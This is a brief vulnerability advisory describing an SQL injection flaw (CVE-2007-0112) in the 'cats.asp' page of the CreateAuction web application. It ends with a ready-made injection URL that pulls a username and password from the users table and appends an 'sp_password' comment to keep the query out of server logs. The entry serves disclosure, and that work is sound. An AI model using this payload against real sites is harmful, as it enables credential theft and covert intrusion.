CreateAuction - 'Cats.asp' SQL Injection

Related Vulnerabilities: CVE-2007-0112  
Publish Date: 08 Jan 2007
Author: IbnuSina
                source: http://www.securityfocus.com/bid/21929/info

Createauction is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.

http://www.example.com/[path]/cats.asp?catid=1%20%20and%201=convert(int,(select%20top%201%20username%2b'/'%2bpassword%20from%20users))--sp_password